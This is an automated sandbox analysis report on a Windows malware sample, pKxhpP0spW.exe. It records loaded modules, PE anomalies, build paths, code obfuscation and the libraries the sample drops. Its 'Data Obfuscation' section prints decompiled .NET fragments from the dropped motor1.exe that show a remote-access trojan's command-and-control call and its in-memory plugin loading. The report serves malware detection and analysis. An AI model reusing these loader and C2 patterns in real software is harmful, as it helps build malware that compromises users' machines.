Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: sspicli.dll

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: pKxhpP0spW.exe

Static PE information: More than 8191 > 100 exports found

Source: pKxhpP0spW.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: pKxhpP0spW.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source: pKxhpP0spW.exe

Static file information: File size 64617520 > 1048576

Source: pKxhpP0spW.exe	Static PE information: Raw size of .text is bigger than: 0x100000 < 0x10f7e00
Source: pKxhpP0spW.exe	Static PE information: Raw size of .rdata is bigger than: 0x100000 < 0xef8600

Source: pKxhpP0spW.exe

Static PE information: More than 200 imports for KERNEL32.dll

Source: pKxhpP0spW.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: pKxhpP0spW.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: pKxhpP0spW.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: pKxhpP0spW.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: pKxhpP0spW.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: pKxhpP0spW.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: pKxhpP0spW.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: pKxhpP0spW.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: D:\J\WS\workspace\Web-installer-WinMac\build64\bin\FndPointer.pdb source: motor1.exe, 00000004.00000002.2548428390.00007FFDA5523000.00000002.00000001.01000000.00000016.sdmp, motor1.exe, 00000004.00000003.2451740824.0000022D5F535000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000015.00000002.2605452248.00007FFDA4DA3000.00000002.00000001.01000000.0000002B.sdmp
Source:	Binary string: D:\J\WS\workspace\Web-installer-WinMac\build64\bin\FndNetworking.pdb source: motor1.exe, 00000004.00000002.2542632185.00007FFD94148000.00000002.00000001.01000000.0000000A.sdmp, motor1.exe, 00000015.00000002.2601968221.00007FFD92D38000.00000002.00000001.01000000.0000001F.sdmp
Source:	Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: api-ms-win-crt-runtime-l1-1-0.dll.1.dr
Source:	Binary string: crypto\stack\stack.ccompiler: cl /Zi /Fdossl_static.pdb /MD /Zl /Gs0 /GF /Gy -O2 -Ob2 -MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASMcrypto\ex_data.c source: motor1.exe, 00000004.00000000.2408388110.00007FF7EDD07000.00000002.00000001.01000000.00000005.sdmp, motor1.exe, 00000004.00000002.2541531038.00007FF7EDD07000.00000002.00000001.01000000.00000005.sdmp, motor1.exe, 00000004.00000002.2542097890.00007FFD93D7C000.00000002.00000001.01000000.00000014.sdmp, motor1.exe, 00000015.00000002.2600550256.00007FF643557000.00000002.00000001.01000000.0000001A.sdmp, motor1.exe, 00000015.00000000.2546559477.00007FF643557000.00000002.00000001.01000000.0000001A.sdmp, motor1.exe, 00000015.00000002.2602655358.00007FFD9370C000.00000002.00000001.01000000.00000027.sdmp
Source:	Binary string: D:\J\WS\workspace\Web-installer-WinMac\build64\bin\FndTime.pdb source: motor1.exe, 00000004.00000002.2546961814.00007FFDA4168000.00000002.00000001.01000000.00000013.sdmp, motor1.exe, 00000004.00000003.2451689953.0000022D5F59F000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000015.00000002.2604332137.00007FFDA3318000.00000002.00000001.01000000.00000026.sdmp
Source:	Binary string: d:\a01\_work\3\s\\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdb source: motor1.exe, 00000004.00000002.2551275327.00007FFDAC0D5000.00000002.00000001.01000000.0000000E.sdmp, motor1.exe, 00000015.00000002.2605772212.00007FFDA54C5000.00000002.00000001.01000000.00000022.sdmp, vcruntime140_1.dll.4.dr
Source:	Binary string: D:\J\WS\workspace\Web-installer-WinMac\build64\bin\FndFilesystem.pdb** source: motor1.exe, 00000004.00000002.2548964543.00007FFDA555F000.00000002.00000001.01000000.0000000F.sdmp, motor1.exe, 00000015.00000002.2603587965.00007FFD9B1BF000.00000002.00000001.01000000.00000028.sdmp
Source:	Binary string: D:\J\WS\workspace\Web-installer-WinMac\build64\bin\FndException.pdb source: motor1.exe, 00000004.00000002.2548205143.00007FFDA4342000.00000002.00000001.01000000.00000011.sdmp, motor1.exe, 00000015.00000002.2604475973.00007FFDA3342000.00000002.00000001.01000000.00000025.sdmp
Source:	Binary string: D:\J\WS\workspace\Web-installer-WinMac\build64\bin\FndTime.pdb source: motor1.exe, 00000004.00000002.2546961814.00007FFDA4168000.00000002.00000001.01000000.00000013.sdmp, motor1.exe, 00000004.00000003.2451689953.0000022D5F59F000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000015.00000002.2604332137.00007FFDA3318000.00000002.00000001.01000000.00000026.sdmp
Source:	Binary string: compiler: cl /Zi /Fdossl_static.pdb /MD /Zl /Gs0 /GF /Gy -O2 -Ob2 -MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASM source: motor1.exe, 00000004.00000002.2543383507.00007FFD944E2000.00000002.00000001.01000000.00000008.sdmp, motor1.exe, 00000004.00000002.2542632185.00007FFD94148000.00000002.00000001.01000000.0000000A.sdmp, motor1.exe, 00000004.00000000.2408388110.00007FF7EDD07000.00000002.00000001.01000000.00000005.sdmp, motor1.exe, 00000004.00000002.2541531038.00007FF7EDD07000.00000002.00000001.01000000.00000005.sdmp, motor1.exe, 00000004.00000002.2542097890.00007FFD93D7C000.00000002.00000001.01000000.00000014.sdmp, motor1.exe, 00000015.00000002.2603187948.00007FFD93A72000.00000002.00000001.01000000.0000001C.sdmp, motor1.exe, 00000015.00000002.2600550256.00007FF643557000.00000002.00000001.01000000.0000001A.sdmp, motor1.exe, 00000015.00000000.2546559477.00007FF643557000.00000002.00000001.01000000.0000001A.sdmp, motor1.exe, 00000015.00000002.2602655358.00007FFD9370C000.00000002.00000001.01000000.00000027.sdmp, motor1.exe, 00000015.00000002.2601968221.00007FFD92D38000.00000002.00000001.01000000.0000001F.sdmp, WebUid.dll.4.dr
Source:	Binary string: D:\J\WS\workspace\Web-installer-WinMac\build64\bin\FndVersion.pdb source: motor1.exe, 00000004.00000002.2546408225.00007FFDA3A8B000.00000002.00000001.01000000.00000017.sdmp, motor1.exe, 00000015.00000002.2604104370.00007FFDA32FB000.00000002.00000001.01000000.00000029.sdmp
Source:	Binary string: D:\J\WS\workspace\Web-installer-WinMac\build64\bin\FndOS.pdb'' source: motor1.exe, 00000004.00000002.2545756356.00007FFDA384D000.00000002.00000001.01000000.00000010.sdmp, motor1.exe, 00000015.00000002.2604639455.00007FFDA336D000.00000002.00000001.01000000.00000024.sdmp
Source:	Binary string: D:\J\WS\workspace\Web-installer-WinMac\build64\bin\FndCrashHandler.pdb source: motor1.exe, 00000004.00000002.2549295572.00007FFDA55D7000.00000002.00000001.01000000.00000009.sdmp, motor1.exe, 00000015.00000002.2605254125.00007FFDA37A7000.00000002.00000001.01000000.0000001D.sdmp, FndCrashHandler.dll.1.dr
Source:	Binary string: D:\J\WS\workspace\Web-installer-WinMac\build64\bin\FndHash.pdb source: motor1.exe, 00000004.00000002.2546678084.00007FFDA3AEE000.00000002.00000001.01000000.00000015.sdmp, motor1.exe, 00000015.00000002.2603749260.00007FFDA2E9E000.00000002.00000001.01000000.0000002A.sdmp
Source:	Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: motor1.exe, 00000004.00000002.2539797410.0000022D5F517000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: crypto\stack\stack.ccompiler: cl /Zi /Fdossl_static.pdb /MD /Zl /Gs0 /GF /Gy -O2 -Ob2 -MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASMOpenSSL 1.1.1k 25 Mar 2021built on: Wed Aug 4 14:11:39 2021 UTCplatform: VC-conan-Release-Windows-x86_64-Visual Studio-16OPENSSLDIR: "D:\conan\openssl\1.1.1k\_\_\package\3fb49604f9c2f729b85ba3115852006824e72cab\res"userSDIR: "D:\conan\openssl\1.1.1k\_\_\package\3fb49604f9c2f729b85ba3115852006824e72cab\lib\users-1_1"not availablecrypto\ex_data.c source: motor1.exe, 00000004.00000002.2543383507.00007FFD944E2000.00000002.00000001.01000000.00000008.sdmp, motor1.exe, 00000004.00000002.2542632185.00007FFD94148000.00000002.00000001.01000000.0000000A.sdmp, motor1.exe, 00000015.00000002.2603187948.00007FFD93A72000.00000002.00000001.01000000.0000001C.sdmp, motor1.exe, 00000015.00000002.2601968221.00007FFD92D38000.00000002.00000001.01000000.0000001F.sdmp, WebUid.dll.4.dr
Source:	Binary string: D:\J\WS\workspace\Web-installer-WinMac\build64\bin\FndCrashHandler.pdbqq source: motor1.exe, 00000004.00000002.2549295572.00007FFDA55D7000.00000002.00000001.01000000.00000009.sdmp, motor1.exe, 00000015.00000002.2605254125.00007FFDA37A7000.00000002.00000001.01000000.0000001D.sdmp, FndCrashHandler.dll.1.dr
Source:	Binary string: D:\J\WS\workspace\Web-installer-WinMac\build64\bin\FndOS.pdb source: motor1.exe, 00000004.00000002.2545756356.00007FFDA384D000.00000002.00000001.01000000.00000010.sdmp, motor1.exe, 00000015.00000002.2604639455.00007FFDA336D000.00000002.00000001.01000000.00000024.sdmp
Source:	Binary string: D:\J\WS\workspace\Web-installer-WinMac\build64\bin\installer.pdb source: motor1.exe, 00000004.00000000.2408388110.00007FF7EDD07000.00000002.00000001.01000000.00000005.sdmp, motor1.exe, 00000004.00000002.2541531038.00007FF7EDD07000.00000002.00000001.01000000.00000005.sdmp, motor1.exe, 00000015.00000002.2600550256.00007FF643557000.00000002.00000001.01000000.0000001A.sdmp, motor1.exe, 00000015.00000000.2546559477.00007FF643557000.00000002.00000001.01000000.0000001A.sdmp
Source:	Binary string: C:\Users\runneradmin\AppData\Local\Temp\pkg.d7c6a10fb0263a69b4596321\node\out\Release\node.pdb source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71C909000.00000002.00000001.01000000.00000003.sdmp
Source:	Binary string: D:\J\WS\workspace\Web-installer-WinMac\build64\bin\FndHash.pdb!! source: motor1.exe, 00000004.00000002.2546678084.00007FFDA3AEE000.00000002.00000001.01000000.00000015.sdmp, motor1.exe, 00000015.00000002.2603749260.00007FFDA2E9E000.00000002.00000001.01000000.0000002A.sdmp
Source:	Binary string: D:\J\WS\workspace\Web-installer-WinMac\build64\bin\FndException.pdb%% source: motor1.exe, 00000004.00000002.2548205143.00007FFDA4342000.00000002.00000001.01000000.00000011.sdmp, motor1.exe, 00000015.00000002.2604475973.00007FFDA3342000.00000002.00000001.01000000.00000025.sdmp
Source:	Binary string: D:\J\WS\workspace\Web-installer-WinMac\build64\bin\FndString.pdb source: motor1.exe, 00000004.00000002.2552861990.00007FFDAC107000.00000002.00000001.01000000.0000000B.sdmp, motor1.exe, 00000015.00000002.2606186290.00007FFDA5BB7000.00000002.00000001.01000000.0000001E.sdmp, FndString.dll.4.dr
Source:	Binary string: d:\a01\_work\3\s\\binaries\amd64ret\bin\amd64\\vcomp140.amd64.pdb source: vcomp140.dll.1.dr
Source:	Binary string: D:\J\WS\workspace\Web-installer-WinMac\build64\bin\WebUid.pdb source: motor1.exe, 00000004.00000002.2543383507.00007FFD944E2000.00000002.00000001.01000000.00000008.sdmp, motor1.exe, 00000004.00000002.2541254363.0000026DF6050000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000015.00000002.2603187948.00007FFD93A72000.00000002.00000001.01000000.0000001C.sdmp, WebUid.dll.4.dr
Source:	Binary string: d:\a01\_work\3\s\\binaries\amd64ret\bin\amd64\\vcomp140.amd64.pdbGCTL source: vcomp140.dll.1.dr
Source:	Binary string: D:\J\WS\workspace\Web-installer-WinMac\build64\bin\FndFilesystem.pdb source: motor1.exe, 00000004.00000002.2548964543.00007FFDA555F000.00000002.00000001.01000000.0000000F.sdmp, motor1.exe, 00000015.00000002.2603587965.00007FFD9B1BF000.00000002.00000001.01000000.00000028.sdmp
Source:	Binary string: D:\J\WS\workspace\Web-installer-WinMac\build64\bin\FndAppLocations.pdb source: motor1.exe, 00000004.00000002.2550154810.00007FFDAC0C5000.00000002.00000001.01000000.00000012.sdmp, motor1.exe, 00000015.00000002.2605618348.00007FFDA5495000.00000002.00000001.01000000.00000023.sdmp
Source:	Binary string: C:\Users\runneradmin\AppData\Local\Temp\pkg.d7c6a10fb0263a69b4596321\node\out\Release\node.pdb) source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71C909000.00000002.00000001.01000000.00000003.sdmp
Source:	Binary string: d:\a01\_work\3\s\\binaries\amd64ret\bin\amd64\\msvcp140_codecvt_ids.amd64.pdb source: motor1.exe, 00000004.00000002.2539797410.0000022D5F52B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: d:\a01\_work\3\s\\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: motor1.exe, 00000004.00000002.2552193033.00007FFDAC0F1000.00000002.00000001.01000000.0000000D.sdmp, motor1.exe, 00000015.00000002.2604813167.00007FFDA3391000.00000002.00000001.01000000.00000021.sdmp
Source:	Binary string: d:\a01\_work\3\s\\binaries\amd64ret\bin\amd64\\msvcp140.amd64.pdb source: motor1.exe, 00000004.00000002.2546154593.00007FFDA38B5000.00000002.00000001.01000000.0000000C.sdmp, motor1.exe, 00000015.00000002.2605019875.00007FFDA33F5000.00000002.00000001.01000000.00000020.sdmp
Source:	Binary string: D:\J\WS\workspace\Web-installer-WinMac\build64\bin\FndAppLocations.pdb source: motor1.exe, 00000004.00000002.2550154810.00007FFDAC0C5000.00000002.00000001.01000000.00000012.sdmp, motor1.exe, 00000015.00000002.2605618348.00007FFDA5495000.00000002.00000001.01000000.00000023.sdmp

Source: pKxhpP0spW.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: pKxhpP0spW.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: pKxhpP0spW.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: pKxhpP0spW.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: pKxhpP0spW.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: 4.2.motor1.exe.22d63855e08.1.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 4.2.motor1.exe.22d63855e08.1.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 4.2.motor1.exe.22d63855e08.1.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
Source: 4.2.motor1.exe.22d65c2e478.3.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 4.2.motor1.exe.22d65c2e478.3.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 4.2.motor1.exe.22d65c2e478.3.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
Source: 4.2.motor1.exe.22d6384cc49.0.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 4.2.motor1.exe.22d6384cc49.0.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 4.2.motor1.exe.22d6384cc49.0.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
Source: 4.2.motor1.exe.22d65ca92a1.2.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 4.2.motor1.exe.22d65ca92a1.2.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 4.2.motor1.exe.22d65ca92a1.2.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
Source: 4.2.motor1.exe.22d65c252b9.4.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 4.2.motor1.exe.22d65c252b9.4.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 4.2.motor1.exe.22d65c252b9.4.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)

.NET source code contains potential unpacker

Source: 4.2.motor1.exe.22d63855e08.1.raw.unpack, Messages.cs	.Net Code: Plugin System.AppDomain.Load(byte[])
Source: 4.2.motor1.exe.22d63855e08.1.raw.unpack, Messages.cs	.Net Code: Memory System.AppDomain.Load(byte[])
Source: 4.2.motor1.exe.22d63855e08.1.raw.unpack, Messages.cs	.Net Code: Memory
Source: 4.2.motor1.exe.22d65c2e478.3.raw.unpack, Messages.cs	.Net Code: Plugin System.AppDomain.Load(byte[])
Source: 4.2.motor1.exe.22d65c2e478.3.raw.unpack, Messages.cs	.Net Code: Memory System.AppDomain.Load(byte[])
Source: 4.2.motor1.exe.22d65c2e478.3.raw.unpack, Messages.cs	.Net Code: Memory
Source: 4.2.motor1.exe.22d6384cc49.0.raw.unpack, Messages.cs	.Net Code: Plugin System.AppDomain.Load(byte[])
Source: 4.2.motor1.exe.22d6384cc49.0.raw.unpack, Messages.cs	.Net Code: Memory System.AppDomain.Load(byte[])
Source: 4.2.motor1.exe.22d6384cc49.0.raw.unpack, Messages.cs	.Net Code: Memory
Source: 4.2.motor1.exe.22d65ca92a1.2.raw.unpack, Messages.cs	.Net Code: Plugin System.AppDomain.Load(byte[])
Source: 4.2.motor1.exe.22d65ca92a1.2.raw.unpack, Messages.cs	.Net Code: Memory System.AppDomain.Load(byte[])
Source: 4.2.motor1.exe.22d65ca92a1.2.raw.unpack, Messages.cs	.Net Code: Memory
Source: 4.2.motor1.exe.22d65c252b9.4.raw.unpack, Messages.cs	.Net Code: Plugin System.AppDomain.Load(byte[])
Source: 4.2.motor1.exe.22d65c252b9.4.raw.unpack, Messages.cs	.Net Code: Memory System.AppDomain.Load(byte[])
Source: 4.2.motor1.exe.22d65c252b9.4.raw.unpack, Messages.cs	.Net Code: Memory

Binary contains a suspicious time stamp

Source: api-ms-win-crt-process-l1-1-0.dll.1.dr

Static PE information: 0xA8F275DA [Mon Oct 27 06:36:10 2059 UTC]

PE file contains sections with non-standard names

Source: pKxhpP0spW.exe	Static PE information: section name: _RDATA
Source: boost_filesystem-mt-x64.dll.1.dr	Static PE information: section name: _RDATA
Source: FndCrashHandler.dll.1.dr	Static PE information: section name: CPADinfo
Source: vcomp140.dll.1.dr	Static PE information: section name: _RDATA
Source: vcruntime140.dll.1.dr	Static PE information: section name: _RDATA
Source: boost_filesystem-mt-x64.dll.4.dr	Static PE information: section name: _RDATA
Source: FndCrashHandler.dll.4.dr	Static PE information: section name: CPADinfo
Source: vcomp140.dll.4.dr	Static PE information: section name: _RDATA
Source: vcruntime140.dll.4.dr	Static PE information: section name: _RDATA

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD93B745BE push rax; retf	4_2_00007FFD93B745D3
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD93B745D7 push rax; retf	4_2_00007FFD93B745D3
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD93E645D7 push rax; retf	4_2_00007FFD93E645D3
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD93E645BE push rax; retf	4_2_00007FFD93E645D3
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD942645D7 push rax; retf	4_2_00007FFD942645D3
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD942645BE push rax; retf	4_2_00007FFD942645D3

Drops PE files

Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	File created: C:\Users\user\SystemRootDoc\msvcp140_codecvt_ids.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	File created: C:\Users\user\SystemRootDoc\FndOS.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	File created: C:\Users\user\SystemRootDoc\WebUid.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	File created: C:\Users\user\SystemRootDoc\api-ms-win-crt-filesystem-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	File created: C:\Users\user\SystemRootDoc\FndHash.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	File created: C:\Users\user\SystemRootDoc\api-ms-win-crt-environment-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	File created: C:\Users\user\SystemRootDoc\FndAppLocations.dll	Jump to dropped file
Source: C:\Users\user\Desktop\pKxhpP0spW.exe	File created: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\api-ms-win-crt-utility-l1-1-0.dll	Jump to dropped file
